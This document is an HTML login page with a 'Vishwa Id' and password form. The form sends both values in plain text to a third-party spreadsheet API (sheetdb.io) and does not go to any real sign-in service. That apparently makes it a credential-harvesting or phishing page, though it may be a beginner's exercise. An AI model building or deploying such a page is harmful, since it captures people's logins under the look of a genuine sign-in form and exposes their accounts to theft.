<html>

<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-img {
  /* The image used */
  background-image: url("00001.jpg");

  min-height: 600px;

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  position: relative;
}

/* Add styles to the form container */
.container {
  position: absolute;
  right: 0;
  margin: 20px;
  max-width: 300px;
  padding: 16px;
  background-color: white;
}
 
/* Full-width input fields */
input[type=text], input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
}

input[type=text]:focus, input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit button */
.btn {
  background-color: #F88D23 ;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  opacity: 0.9;
}

.btn:hover {
  opacity: 1;
}
</style>
</head>
<body>
<div class="bg-img">
  <form action="https://sheetdb.io/api/v1/884ag51ny4e1a" method="post" id="sheetdb-form" class="container">
    <h1>Login</h1>

    <label for="Username"><b>Username</b></label>
    <input type="text" placeholder="Vishwa Id" name="data[Vishwa Id]" required>

    <label for="text"><b>Password</b></label>
    <input type="text" placeholder="Enter Password" name="data[Text]" required>

<a href="/workspaces/codespaces-blank/sampath001.html">
    <button type="submit" class="btn">Login</button>
</a>
  </form>
</div>


		</div>
</body>
</html>
